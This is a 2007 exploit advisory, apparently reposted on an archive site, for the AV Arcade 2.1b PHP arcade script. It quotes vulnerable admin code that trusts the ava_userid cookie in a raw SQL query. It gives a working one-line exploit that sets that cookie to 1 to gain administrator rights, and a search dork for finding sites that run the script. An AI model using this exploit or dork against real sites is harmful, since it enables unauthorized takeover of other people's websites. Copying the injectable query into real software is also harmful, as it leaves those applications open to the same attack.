Home / os / solaris

avarcade-admin.txt

Posted on 03 July 2007

AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights Web: AV Arcade 2.1b Site : www.avscripts.net Dork : "Powered By AV Arcade" Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ] Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET Vurnerable code: admin/index.php: $sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid'].""); while($row = mysql_fetch_array($sql)){ if ($row['admin'] == 1) { define( 'ADMIN_ACCESS', 1 ); [...] Exploit: Set in your cookies: ava_userid = 1; and that`s all :p GREETZ: all memberz of RST and milw0rm //kw3rln [ http://rstzone.net ] [EOF]

 

TOP